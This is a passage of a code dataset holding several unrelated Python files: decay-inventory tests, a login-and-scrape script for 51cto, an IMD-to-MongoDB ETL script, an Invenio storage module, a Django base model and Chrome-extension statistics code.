85.00820732310412,\n \"Pb-210\": 85.01434361489548,\n \"Pb-211\": 0.2690008442558569,\n \"Pb-214\": 84.99734032384839,\n \"Po-210\": 85.01434362236536,\n \"Po-211\": 0.0007424423301461693,\n \"Po-214\": 84.99649018398776,\n \"Po-215\": 0.26900084425583065,\n \"Po-218\": 85.01434319248591,\n \"Ra-223\": 0.26900062820528614,\n \"Ra-226\": 85.01434319228659,\n \"Rn-218\": 1.7002868638497185e-05,\n \"Rn-219\": 0.26900062820528614,\n \"Rn-222\": 85.0143431924858,\n \"Th-227\": 0.2652884195245263,\n \"Th-230\": 85.01431274847525,\n \"Th-231\": 0.26898810215560653,\n \"Th-234\": 85.00820732310407,\n \"Tl-206\": 0.00011383420610068998,\n \"Tl-207\": 0.26825840192571576,\n \"Tl-210\": 0.01785300849981999,\n \"U-234\": 85.01287846492669,\n \"U-235\": 0.2689881021544942,\n \"U-238\": 85.00820732184867,\n },\n )\n\n # Catch incorrect sig_fig or no SymPy data in decay dataset\n with self.assertRaises(ValueError):\n inv.decay(1e9, \"y\", sig_fig=0)\n data = DecayData(\"icrp107\", load_sympy=False)\n inv = Inventory({\"H-3\": 10.0}, data=data)\n with self.assertRaises(ValueError):\n inv.decay(1e9, \"y\", sig_fig=320)\n\n def test_inventory_decay_high_precision(self):\n \"\"\"\n Test Inventory decay_high_precision() calculations.\n \"\"\"\n inv = Inventory({\"U-238\": 99.274, \"U-235\": 0.720, \"U-234\": 0.005})\n self.assertEqual(\n inv.decay_high_precision(1e9, \"y\").contents,\n {\n \"Ac-227\": 0.26900062817405557,\n \"At-218\": 0.01700286863849718,\n \"At-219\": 2.227325201281318e-07,\n \"Bi-210\": 85.01434361515662,\n \"Bi-211\": 0.2690008442558584,\n \"Bi-214\": 85.01432618961894,\n \"Bi-215\": 2.1605054452429227e-07,\n \"Fr-223\": 0.003712208668802187,\n \"Hg-206\": 1.6152725286830195e-06,\n \"Pa-231\": 0.2690006198549054,\n \"Pa-234\": 0.13601313171698984,\n \"Pa-234m\": 85.00820732310412,\n \"Pb-210\": 85.01434361489547,\n \"Pb-211\": 0.26900084425585685,\n \"Pb-214\": 84.99734032384836,\n \"Po-210\": 85.01434362236536,\n \"Po-211\": 0.0007424423301461693,\n \"Po-214\": 84.99649018398776,\n \"Po-215\": 0.26900084425583065,\n \"Po-218\": 85.0143431924859,\n \"Ra-223\": 0.2690006282052861,\n \"Ra-226\": 85.0143431922866,\n \"Rn-218\": 1.7002868638497178e-05,\n \"Rn-219\": 0.26900062820528614,\n \"Rn-222\": 85.01434319248578,\n \"Th-227\": 0.26528841952452625,\n \"Th-230\": 85.01431274847525,\n \"Th-231\": 0.26898810215560653,\n \"Th-234\": 85.00820732310407,\n \"Tl-206\": 0.00011383420610068996,\n \"Tl-207\": 0.2682584019257157,\n \"Tl-210\": 0.017853008499819988,\n \"U-234\": 85.01287846492669,\n \"U-235\": 0.26898810215449415,\n \"U-238\": 85.00820732184867,\n },\n )\n\n def test_inventory_half_lives(self):\n \"\"\"\n Test method to fetch half-lives of radionuclides in the Inventory.\n \"\"\"\n\n inv = Inventory({\"C-14\": 1.0, \"H-3\": 2.0})\n self.assertEqual(inv.half_lives(\"y\"), {\"C-14\": 5700.0, \"H-3\": 12.32})\n self.assertEqual(\n inv.half_lives(\"readable\"), {\"C-14\": \"5.70 ky\", \"H-3\": \"12.32 y\"}\n )\n\n def test_inventory_progeny(self):\n \"\"\"\n Test method to fetch progeny of radionuclides in the Inventory.\n \"\"\"\n\n inv = Inventory({\"C-14\": 1.0, \"K-40\": 2.0})\n self.assertEqual(inv.progeny(), {\"C-14\": [\"N-14\"], \"K-40\": [\"Ca-40\", \"Ar-40\"]})\n\n def test_inventory_branching_fractions(self):\n \"\"\"\n Test method to fetch branching fractions of radionuclides in the Inventory.\n \"\"\"\n\n inv = Inventory({\"C-14\": 1.0, \"K-40\": 2.0})\n self.assertEqual(\n inv.branching_fractions(), {\"C-14\": [1.0], \"K-40\": [0.8914, 0.1086]}\n )\n\n def test_inventory_decay_modes(self):\n \"\"\"\n Test method to fetch decay modes of radionuclides in the Inventory.\n \"\"\"\n\n inv = Inventory({\"C-14\": 1.0, \"K-40\": 2.0})\n self.assertEqual(\n inv.decay_modes(),\n {\"C-14\": [\"\\u03b2-\"], \"K-40\": [\"\\u03b2-\", \"\\u03b2+ \\u0026 EC\"]},\n )\n\n @patch(\"matplotlib.pyplot.show\")\n def test_inventory_plot(self, mock_show):\n \"\"\"\n Test method to create decay plots.\n \"\"\"\n\n inv = Inventory({\"C-14\": 1.0, \"K-40\": 2.0})\n _, ax = inv.plot(105, \"ky\")\n self.assertEqual(ax.get_xscale(), \"linear\")\n self.assertEqual(ax.get_yscale(), \"linear\")\n self.assertEqual(ax.get_xlabel(), \"Time (ky)\")\n self.assertEqual(ax.get_ylabel(), \"Activity\")\n self.assertEqual(ax.get_xlim(), (-5.25, 110.25))\n self.assertEqual(ax.get_ylim(), (0.0, 2.1))\n self.assertEqual(ax.get_legend_handles_labels()[-1], [\"K-40\", \"C-14\"])\n\n _, ax = inv.plot(\n 100,\n xscale=\"log\",\n yscale=\"log\",\n yunits=\"Bq\",\n sig_fig=320,\n display=[\"K40\", \"C14\"],\n )\n self.assertEqual(ax.get_xscale(), \"log\")\n self.assertEqual(ax.get_yscale(), \"log\")\n self.assertEqual(ax.get_xlabel(), \"Time (s)\")\n self.assertEqual(ax.get_ylabel(), \"Activity (Bq)\")\n self.assertEqual(ax.get_xlim()[0], 0.0707945784384138)\n self.assertEqual(ax.get_ylim(), (0.1, 2.1))\n self.assertEqual(ax.get_legend_handles_labels()[-1], [\"K-40\", \"C-14\"])\n\n _, ax = inv.plot(100, \"ky\", xmin=50, ymin=1.0, ymax=2.5, display=\"K40\")\n self.assertEqual(ax.get_xlim(), (47.5, 102.5))\n self.assertEqual(ax.get_ylim(), (1.0, 2.5))\n self.assertEqual(ax.get_legend_handles_labels()[-1], [\"K-40\"])\n\n _, ax = inv.plot(100, \"ky\", order=\"alphabetical\")\n self.assertEqual(ax.get_legend_handles_labels()[-1], [\"C-14\", \"K-40\"])\n\n with self.assertRaises(ValueError):\n inv.plot(100, \"ky\", order=\"invalid\")\n\n def test_inventory___repr__(self):\n \"\"\"\n Test Inventory representations.\n \"\"\"\n\n inv = Inventory({\"H-3\": 10.0})\n self.assertEqual(\n inv.__repr__(), \"Inventory: {'H-3': 10.0}, decay dataset: icrp107\"\n )\n\n def test_inventory___eq__(self):\n \"\"\"\n Test Inventory equality.\n \"\"\"\n\n inv1 = Inventory({\"H-3\": 10.0})\n inv2 = Inventory({\"H3\": 10.0})\n self.assertEqual(inv1, inv2)\n\n data = DecayData(\"icrp107\")\n inv2 = Inventory({\"H-3\": 10.0}, data)\n self.assertEqual(inv1, inv2)\n\n def test_inventory___ne__(self):\n \"\"\"\n Test Inventory not equality.\n \"\"\"\n\n inv1 = Inventory({\"H-3\": 10.0})\n inv2 = Inventory({\"Cs-137\": 10.0})\n self.assertNotEqual(inv1, inv2)\n\n inv1 = Inventory({\"H-3\": 10.0})\n inv2 = Inventory({\"H-3\": 5.0})\n self.assertNotEqual(inv1, inv2)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"tests/test_inventory.py","file_name":"test_inventory.py","file_ext":"py","file_size_in_byte":19226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"221259042","text":"from bs4 import BeautifulSoup\r\nimport requests\r\nfrom selenium import webdriver\r\nheaders={\r\n 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\r\n 'Accept-Encoding':'gzip, deflate',\r\n 'Accept-Language':'zh-CN,zh;q=0.8',\r\n 'Cache-Control':'max-age=0',\r\n 'Content-Type':'application/x-www-form-urlencoded',\r\n 'Host':'home.51cto.com',\r\n 'Referer':'http://home.51cto.com/index',\r\n 'Proxy-Connection':'keep-alive'\r\n }\r\n\r\n\r\n\r\nurl=\"http://home.51cto.com/index\"\r\n\r\nsession=requests.Session()\r\nresponse=session.get(url,headers=headers)\r\nprint(session.cookies)\r\nbs=BeautifulSoup(response.content,\"html.parser\")\r\ncsrf=bs.find(\"input\",attrs={\"name\":\"_csrf\"}).get(\"value\")\r\nprint(csrf+\"\\n\")\r\ndata={\r\n '_csrf':csrf,\r\n\t'LoginForm[username]':\"xxxxxxx\",\r\n\t'LoginForm[password]':\"xxxxxxx\",\r\n\t'LoginForm[rememberMe]':'0',\r\n\t'login-button':'登 录'\r\n }\r\n\r\n\r\nsession.post(url,data=data,headers=headers)\r\n\r\nresponse=session.get(\"http://down.51cto.com/credits\")\r\n#driver=webdriver.Chrome(r\"C:\\Python\\phantomjs\\bin\\chromedriver.exe\")\r\n#driver.get(\"http://down.51cto.com/credits\")\r\nbs=BeautifulSoup(response.content,\"html.parser\")\r\nprint(bs)\r\n","sub_path":"spider/spider2.py","file_name":"spider2.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"414675512","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Aug 12 01:02:05 2018\r\n@author: Abdur\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport pymongo\r\nimport json\r\nimport numpy as np\r\n\r\n#read csv raw data\r\ndfNspl=pd.read_csv(\"NSPL_FEB_2018_UK.csv\")\r\ndfImd=pd.read_csv(\"imd.csv\")\r\n#data reduction\r\ndfNspl=dfNspl.loc[dfNspl['doterm'].isnull()] #livepostcodes only\r\ndfNspl=dfNspl.loc[dfNspl['ctry']=='E92000001']#filtering out all other countries in UK except England\r\ncolumns_Imd=[\r\n \"lsoa11\",\r\n \"EmploymentScore\",\r\n \"EducationSkillsandTrainingScore\",\r\n \"HealthDeprivationandDisabilityScore\",\r\n \"CrimeScore\"]\r\n\r\ncolumns_Nspl=[\"lsoa11\",\"lat\",\"long\"]\r\ndfNspl=dfNspl[columns_Nspl]\r\ndfImd=dfImd[columns_Imd]\r\n\r\n\r\n\r\n\r\n# merge the reduced datasets\r\ndf_merge=pd.merge(dfImd, dfNspl, on='lsoa11', how='outer')#left outer join, to ignore any areas that are not included in IMD dataset\r\n\r\n#reduce decimal places and group by lat,long pair (as a composite key) because the 2 columns make one location entity\r\npd.options.display.float_format = '{:.4f}'.format\r\n\r\nrounded=df_merge.round(4)\r\n\r\ngrouped_rounded = rounded.groupby(['lat','long']).mean()\r\n\r\ngrouped_rounded = grouped_rounded.reset_index()\r\n\r\nfinal_columns=[\"lat\",\"long\",\r\n \"EmploymentScore\",\r\n \"EducationSkillsandTrainingScore\",\r\n \"HealthDeprivationandDisabilityScore\",\r\n \"CrimeScore\"]\r\n\r\n#rename columns \r\nfinal_new_columns=grouped_rounded.columns = [\"lat\",\"long\",\r\n \"EmploymentScore\",\r\n \"EducationScore\",\r\n \"HealthScore\",\r\n \"CrimeScore\"]\r\ngrouped_rounded.rename(columns = {'EducationSkillsandTrainingScore':'EducationScore'\r\n ,'HealthDeprivationandDisabilityScore':'HealthScore'}, inplace = True)\r\n\r\n\r\n#insert in mongodb\r\nmng_client = pymongo.MongoClient('localhost', 27017);\r\nmng_db = mng_client['myNewdb2'] ;\r\ncollection_name = 'shortAndSelected4'\r\n\r\ndata_json = json.loads(grouped_rounded.to_json(orient='records'))\r\ndb_cm = mng_db[collection_name]\r\ndb_cm.remove()\r\ndb_cm.insert(data_json)\r\nprint(\"done\")\r\n#imd District \r\n\r\ndfImdDistrict=pd.read_csv(\"imd.csv\")\r\n\r\n#group \r\ngrouped = dfImdDistrict.groupby(['LocalAuthorityDistrictname'],as_index=False).mean()\r\n\r\ngrouped = grouped.reset_index()\r\n# write to mongo\r\ndata_json = json.loads(grouped.to_json(orient='records'))\r\nmng_client = pymongo.MongoClient('localhost', 27017);\r\nmng_db = mng_client['myNewdb2'] ;\r\ncollection_name = 'imd2'\r\ndb_cm = mng_db[collection_name]\r\ndb_cm.remove()\r\ndb_cm.insert(data_json)","sub_path":"etl_pre.py","file_name":"etl_pre.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"410004116","text":"# -*- coding: utf-8 -*-\n#\n# This file is part of Lifewatch DAAP.\n# Copyright (C) 2015 Ana Yaiza Rodriguez Marrero.\n#\n# Lifewatch DAAP is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# Lifewatch DAAP is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Lifewatch DAAP. If not, see .\n\n#\n# This file is part of Invenio.\n# Copyright (C) 2013, 2015 CERN.\n#\n# Invenio is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License as\n# published by the Free Software Foundation; either version 2 of the\n# License, or (at your option) any later version.\n#\n# Invenio is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Invenio; if not, write to the Free Software Foundation, Inc.,\n# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.\n\n\"\"\"Storage abstraction layer for WebDeposit.\"\"\"\n\nimport hashlib\nimport urllib2\nimport uuid\n\nfrom fs import opener\nfrom fs import path\n\nfrom flask import current_app\n\nfrom invenio.base.globals import cfg\n\n\nclass UploadError(IOError):\n\n \"\"\"Error during upload.\"\"\"\n\n\nclass ExternalFile(object):\n\n \"\"\"Wrapper around a URL to make it behave like a file.\n\n Allows external files to be passed to the storage layer.\n \"\"\"\n\n def __init__(self, url, filename):\n \"\"\"Initialiez external file.\"\"\"\n from invenio.legacy.bibdocfile.api import open_url, \\\n InvenioBibdocfileUnauthorizedURL\n try:\n self._file = open_url(url, headers={})\n self.filename = None\n info = self._file.info()\n content_disposition = info.getheader('Content-Disposition')\n if content_disposition:\n for item in content_disposition.split(';'):\n current_app.logger.debug(\"item: %s\" % item)\n item = item.strip()\n if item.strip().startswith('filename='):\n s = item[len('filename='):]\n if (s[0] == s[-1]) and s.startswith((\"'\", '\"')):\n s = s[1:-1]\n self.filename = s\n current_app.logger.debug(\"filename: %s\"\n % self.filename)\n if not self.filename:\n self.filename = filename\n\n length = info.getheader('Content-length')\n if length is None:\n current_app.logger.warning(\"Content-Length not set!\")\n length = 0\n size = int(length)\n if size > cfg['DEPOSIT_MAX_UPLOAD_SIZE']:\n raise UploadError(\"File too big\")\n except InvenioBibdocfileUnauthorizedURL as e:\n raise UploadError(str(e))\n except urllib2.URLError as e:\n raise UploadError('URL could not be opened: %s' % str(e))\n\n def close(self):\n \"\"\"Close the external file.\"\"\"\n self._file.close()\n\n def read(self, chunk_size=None):\n \"\"\"Read the external file.\"\"\"\n return self._file.read()\n\n\nclass Storage(object):\n\n \"\"\"Default storage backend.\"\"\"\n\n _fsdir = None\n\n def __init__(self, fs_path):\n \"\"\"Initialize with file system path.\"\"\"\n self.fs_path = fs_path\n\n @property\n def storage(self):\n \"\"\"Get the pyFilesytem object for the backend path.\"\"\"\n if self._fsdir is None:\n # Opens a directory, creates it if needed, and ensures\n # it is writeable.\n self._fsdir = opener.fsopendir(\n self.fs_path, writeable=True, create_dir=True\n )\n return self._fsdir\n\n def unique_filename(self, filename):\n \"\"\"Generate a unique secure filename.\"\"\"\n return str(uuid.uuid4()) + \"-\" + filename\n\n def save(self, incoming_file, filename, unique_name=True,\n with_checksum=True, chunksize=65536):\n \"\"\"Store the incoming file.\"\"\"\n if unique_name:\n filename = self.unique_filename(filename)\n\n fs_file = self.storage.open(filename, 'wb')\n checksum = None\n m = hashlib.md5()\n\n f_bytes = incoming_file.read(chunksize)\n while f_bytes:\n fs_file.write(f_bytes)\n if with_checksum:\n m.update(f_bytes)\n f_bytes = incoming_file.read(chunksize)\n\n fs_file.close()\n checksum = m.hexdigest()\n\n # Create complete file path and return it\n return (\n path.join(self.fs_path, filename),\n self.storage.getsize(filename),\n checksum,\n with_checksum,\n )\n\n @staticmethod\n def delete(fs_path):\n \"\"\".Delete the file on storage.\"\"\"\n (dirurl, filename) = opener.pathsplit(fs_path)\n fs = opener.fsopendir(dirurl)\n fs.remove(filename)\n\n @staticmethod\n def is_local(fs_path):\n \"\"\"Determine if file is a local file.\"\"\"\n (dirurl, filename) = opener.pathsplit(fs_path)\n fs = opener.fsopendir(dirurl)\n return fs.hassyspath(filename)\n\n @staticmethod\n def get_url(fs_path):\n \"\"\"Get a URL for the file.\"\"\"\n (dirurl, filename) = opener.pathsplit(fs_path)\n fs = opener.fsopendir(dirurl)\n return fs.getpathurl(filename)\n\n @staticmethod\n def get_syspath(fs_path):\n \"\"\"Get a local system path to the file.\"\"\"\n (dirurl, filename) = opener.pathsplit(fs_path)\n fs = opener.fsopendir(dirurl)\n return fs.getsyspath(filename)\n\n\nclass DepositionStorage(Storage):\n\n \"\"\"Deposition storage backend.\n\n Saves files to a folder (//).\n \"\"\"\n\n def __init__(self, deposition_id):\n \"\"\"Initialize storage.\"\"\"\n self.fs_path = path.join(\n cfg['DEPOSIT_STORAGEDIR'],\n str(deposition_id)\n )\n\n\nclass ChunkedDepositionStorage(DepositionStorage):\n\n \"\"\"Chunked storage backend.\n\n Capable of handling storage of a file in multiple chunks. Otherwise\n similar to DepositionStorage.\n \"\"\"\n\n def chunk_filename(self, filename, chunks, chunk):\n \"\"\"Generate chunk file name.\"\"\"\n return \"%s_%s_%s\" % (\n filename,\n chunks,\n chunk,\n )\n\n def save(self, incoming_file, filename, chunk=None, chunks=None):\n \"\"\"Save one chunk of an incoming file.\"\"\"\n try:\n # Generate chunked file name\n chunk = int(chunk)\n chunks = int(chunks)\n except (ValueError, TypeError):\n raise UploadError(\"Invalid chunk value: %s\" % chunk)\n\n # Store chunk\n chunk_filename = self.chunk_filename(filename, chunks, chunk)\n\n res = super(ChunkedDepositionStorage, self).save(\n incoming_file, chunk_filename, unique_name=False,\n with_checksum=False,\n )\n\n # Only merge files on last_trunk\n if chunk != chunks - 1:\n return res\n\n # Get the chunks\n file_chunks = self.storage.listdir(\n wildcard=self.chunk_filename(\n filename, chunks, '*'\n )\n )\n file_chunks.sort(key=lambda x: int(x.split(\"_\")[-1]))\n\n # Write the chunks into one file\n filename = self.unique_filename(filename)\n fs_file = self.storage.open(filename, 'wb')\n m = hashlib.md5()\n\n for c in file_chunks:\n fs_c = self.storage.open(c, 'rb')\n\n f_bytes = fs_c.read(65536)\n while f_bytes:\n fs_file.write(f_bytes)\n m.update(f_bytes)\n f_bytes = fs_c.read(65536)\n\n fs_c.close()\n\n # Remove each chunk right after appending to main file, to\n # minimize storage usage.\n self.storage.remove(c)\n\n fs_file.close()\n checksum = m.hexdigest()\n\n return (\n path.join(self.fs_path, filename),\n self.storage.getsize(filename),\n checksum,\n True\n )\n","sub_path":"lw_daap/modules/invenio_deposit/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":8641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"242127504","text":"\"\"\"\nDefinition of models.\n\"\"\"\n\nfrom django.db import models\n\nclass BaseModel(models.Model):\n created = models.DateTimeField(auto_now_add=True, db_index=True, blank=False, null=False)\n updated = models.DateTimeField(db_index=True, blank=False, auto_now=True)\n\n def set_fields_from_dict(self, fields, data, exclusion_list=None):\n \"\"\" apply a dictionary to the fields of an object \"\"\"\n \n if exclusion_list is None:\n exclusion_list = []\n\n for key in data:\n if key in exclusion_list:\n continue\n if (key in fields) and (key not in exclusion_list):\n if type(data[key]) is set:\n data[key] = list(data[key])\n setattr(self, key, data[key])\n\n class Meta:\n abstract = True\n default_permissions = ()\n ordering = (\"-created\",)\n","sub_path":"weblog/app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"379918972","text":"from datetime import datetime\nimport json\nfrom re import match\nfrom subprocess import check_output\n\nfrom bs4 import BeautifulSoup as Bsoup\nfrom plotly import offline as plotoff\nfrom plotly.graph_objs import Bar, Layout, Figure\nfrom sqlalchemy import Table, select, update, and_, insert, desc\n\nfrom common.chrome_db import *\n\nTESTING = False\n\n\ndef set_all_centroid_families():\n # Look through the DB for extension entries that don't have a centroid family listed\n db_conn = DB_META.bind.connect() # Connect to the database\n\n # Get a handle on the two tables\n extension = Table('extension', DB_META)\n cent_fam = Table('centroid_family', DB_META)\n\n # Cycle through all the entries that don't have an assigned centroid family yet\n s = select([extension]).where(extension.c.centroid_group.is_(None))\n cnt = 0\n for e_row in db_conn.execute(s):\n s_fam = select([cent_fam]).where(and_(cent_fam.c.size == e_row[extension.c.size],\n # cent_fam.c.ctime == e_row[extension.c.ctime],\n cent_fam.c.num_dirs == e_row[extension.c.num_dirs],\n cent_fam.c.num_files == e_row[extension.c.num_files],\n cent_fam.c.ttl_files == e_row[extension.c.ttl_files],\n cent_fam.c.perms == e_row[extension.c.perms],\n cent_fam.c.depth == e_row[extension.c.depth],\n cent_fam.c.type == e_row[extension.c.type],))\n\n f_row = db_conn.execute(s_fam).fetchone()\n if f_row:\n with db_conn.begin():\n # Entry exists. Add the index to the extension row to connect to the family\n db_conn.execute(update(extension).where(extension.c.pk == e_row['pk']).\n values(centroid_group=f_row['pk']))\n\n # Increment the membership count and set the last updated value to now\n db_conn.execute(update(cent_fam).where(cent_fam.c.pk == f_row['pk']).\n values(num_members=f_row['num_members']+1,\n members_updated=datetime.today()))\n cnt += 1\n\n else:\n with db_conn.begin():\n # Family entry doesn't exist, create it with a family membership count of 1, last updated value of now\n fam_vals = {'size': e_row[extension.c.size],\n # 'ctime': e_row[extension.c.ctime],\n 'num_dirs': e_row[extension.c.num_dirs],\n 'num_files': e_row[extension.c.num_files],\n 'ttl_files': e_row[extension.c.ttl_files],\n 'perms': e_row[extension.c.perms],\n 'depth': e_row[extension.c.depth],\n 'type': e_row[extension.c.type],\n 'num_members': 1,\n 'members_updated': datetime.today()}\n res = db_conn.execute(insert(cent_fam).values(fam_vals))\n\n # Add the index of the new family to the extension row to connect them\n db_conn.execute(update(extension).where(extension.c.pk == e_row['pk']).\n values(centroid_group=res.inserted_primary_key[0]))\n cnt += 1\n\n if cnt and not cnt % 1000:\n print('Added %d extensions to a family' % cnt)\n\n print('Added %d extensions to a family' % cnt)\n\n # TODO: We should do the same kind of thing for all the extensions' i_centroid_group\n\n calc_it(db_conn)\n\n db_conn.close()\n\n\ndef calc_it(db_conn=None):\n close_conn = False\n if db_conn is None:\n close_conn = True\n db_conn = DB_META.bind.connect() # Connect to the database\n\n # Get a handle on the two tables\n extension = Table('extension', DB_META)\n cent_fam = Table('centroid_family', DB_META)\n\n # Cycle through the centroid family IDs\n # TODO: Make this more efficient by selecting only those that are NULL or all members > distinct\n s = select([cent_fam.c.pk])\n for f2_row in db_conn.execute(s):\n # Query the extension table for the members of the family, counting the distinct ones\n all_mem = select([extension.c.ext_id, extension.c.pk]).\\\n where(extension.c.centroid_group == f2_row[cent_fam.c.pk]).alias('all_members')\n s_cnt = select([all_mem.c.ext_id], distinct=True).select_from(all_mem).alias('distinct_id_members').count()\n # print(str(s_cnt))\n # break\n n = int(db_conn.execute(s_cnt).fetchone()[0])\n\n # Add this count as the distinct_id_members field\n with db_conn.begin():\n db_conn.execute(update(cent_fam).where(cent_fam.c.pk == f2_row[cent_fam.c.pk]).\n values(distinct_id_members=n,\n distinct_members_updated=datetime.today()))\n\n if close_conn:\n db_conn.close()\n\n\ndef reset_membership_counts():\n # Have the DB tell us how many extensions are part of each family\n pass\n\n\ndef count_ext_versions():\n db_conn = DB_META.bind.connect() # Connect to the database\n\n # Get a handle on the table\n extension = Table('extension', DB_META)\n\n # Get the list of distinct CRX IDs from the extension table\n # We don't want to get the list from the id_list table because not all the IDs in that table are helpful here\n s = select([extension.c.ext_id]).distinct()\n version_counts = {}\n id_cnt = 0\n\n # For each distinct ID, count how many rows have that ID\n for d_row in db_conn.execute(s):\n s_cnt = select([extension.c.version]).where(extension.c.ext_id == d_row[extension.c.ext_id]).\\\n alias('version_count').count()\n n = db_conn.execute(s_cnt).fetchone()[0]\n\n try:\n version_counts[n] += 1\n except KeyError:\n version_counts[n] = 1\n\n id_cnt += 1\n if not id_cnt % 1000:\n print('Counted versions of %d IDs' % id_cnt)\n\n db_conn.close()\n\n # Make a backup of the data\n with open('version_counts.json', 'w') as fout:\n json.dump(version_counts, fout)\n\n # Plot the data\n plot_data(version_counts)\n\n\ndef plot_from_count_backup():\n with open('version_counts.json') as fin:\n counts = json.load(fin)\n plot_data(counts)\n\n\ndef plot_data(counts):\n \"\"\"\n Create a plot of the data in the counts dict.\n\n :param counts: Dictionary of {version_count: ID_count}.\n :type counts: dict\n :return: None\n :rtype: None\n \"\"\"\n # Create the plot of the data\n d = {'x': [], 'y': []}\n for x in counts:\n d['x'].append(x)\n d['y'].append(counts[x])\n data = [Bar(x=d['x'], y=d['y'])]\n\n plotoff.plot(data, show_link=False, filename='count_ext_versions_graph.html', auto_open=False)\n\n\ndef get_top_exts(web_store_scrape_file, with_num_ratings=False):\n \"\"\"\n Scrape the file, return the extension IDs.\n\n :param web_store_scrape_file: Should be a path to a HTML file taken from\n the Chrome Web Store showing the \"Popular\" category. There's no\n guarantee that the CSS and tag attributes used to locate the desired\n information will work in the future. Check the Web Store's source to be\n sure.\n :type web_store_scrape_file: str\n :param with_num_ratings: Flag indicates if the number of reviews should\n also be returned. If True, the return type will be a dictionary.\n :type with_num_ratings: bool\n :return: The list of extension IDs.\n :rtype: tuple|dict\n \"\"\"\n soup = Bsoup(web_store_scrape_file, \"lxml\")\n ext_num_ratings = {}\n\n for tile in soup.find_all('div', class_='webstore-test-wall-tile'):\n link = tile.a.get('href')\n ext_id = id_from_url(link)\n\n rating = tile.find('div', attrs={'g:type': \"AverageStarRating\"})\n num_ratings = int(rating.span.string[1:-1]) # Number with parentheses around them\n\n ext_num_ratings[ext_id] = num_ratings\n\n if with_num_ratings:\n return ext_num_ratings\n return tuple(ext_num_ratings.keys())\n\n\ndef id_from_url(url):\n \"\"\"\n Extract the extension ID from a Web Store URL.\n\n :param url: URL to the extension on the Chrome Web Store.\n :type url: str\n :return: The 32-character ID, or None.\n :rtype: str|None\n \"\"\"\n pat = r'https://chrome.google.com/webstore/detail.*/([a-z]{32})/?'\n m = match(pat, url)\n if m:\n return m.group(1)\n\n\ndef get_num_files():\n # Get a handle on the DB and table\n db_conn = DB_META.bind.connect()\n extension = Table('extension', DB_META)\n\n # Iterate through the DB, get the ID and version number\n s = select([extension.c.pk, extension.c.ext_id, extension.c.version]).where(extension.c.ttl_files.is_(None))\n cnt = 0\n not_found = 0\n for row in db_conn.execute(s):\n # CWD to the location of the unpacked CRX\n the_dir = '/var/lib/dbling/unpacked/{}/{}'.format(row[extension.c.ext_id], row[extension.c.version])\n\n # Execute `find | wc -l` to get the number of files\n try:\n ttl_files = int(check_output('/usr/bin/find | /usr/bin/wc -l', shell=True, cwd=the_dir).strip())\n except FileNotFoundError:\n # Doesn't hurt anything that we don't have the files for this extension, but we should count it\n not_found += 1\n continue\n\n # Update the DB with the number of files\n with db_conn.begin():\n db_conn.execute(update(extension).where(extension.c.pk == row[extension.c.pk]).values(ttl_files=ttl_files))\n\n cnt += 1\n if cnt and not cnt % 1000:\n print('Counted files for %d extensions' % cnt)\n\n print('Counted files for %d extensions' % cnt)\n if not_found:\n print(\"%d database entries don't have corresponding files saved.\" % not_found)\n db_conn.close()\n\n\ndef family_histogram():\n db_conn = DB_META.bind.connect()\n cent_fam = Table('centroid_family', DB_META)\n\n # Get the number of members in each centroid family, in descending order\n d = {'x': [], 'y': []}\n s = select([cent_fam.c.distinct_id_members]).order_by(desc(cent_fam.c.distinct_id_members))\n x = 0\n\n for row in db_conn.execute(s):\n x += 1\n d['x'].append(x)\n d['y'].append(row[cent_fam.c.distinct_id_members])\n if x >= 200:\n break\n db_conn.close()\n\n data = [Bar(x=d['x'], y=d['y'])]\n layout = Layout(xaxis=dict(autorange=True), yaxis=dict(type='log', autorange=True))\n fig = Figure(data=data, layout=layout)\n\n plotoff.plot(fig, show_link=False, filename='centroid_family_hist.html')#, auto_open=False, layout=layout)\n\n\ndef tao_histo():\n db_conn = DB_META.bind.connect()\n extension = Table('extension', DB_META)\n\n d = {'x': [], 'y': []}\n\n # Get the set of distinct ttl_files values\n s = select([extension.c.ttl_files], distinct=True)\n\n for dist in db_conn.execute(s):\n x = dist[extension.c.ttl_files]\n t_cnt = select([extension.c.pk]).where(extension.c.ttl_files == x).alias('tao').count()\n y = db_conn.execute(t_cnt).fetchone()[0]\n d['x'].append(x)\n d['y'].append(y)\n\n data = [Bar(x=d['x'], y=d['y'])]\n plotoff.plot(data, show_link=False, filename='tao_histo.html', auto_open=True)\n","sub_path":"other/crx_stats.py","file_name":"crx_stats.py","file_ext":"py","file_size_in_byte":11422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"438874698","text":"# This file is part of sner4 project governed by MIT license, see the LICENSE.txt file.\n\"\"\"\nagent to server protocol definition\n\n\n## Agent-Server protocol is 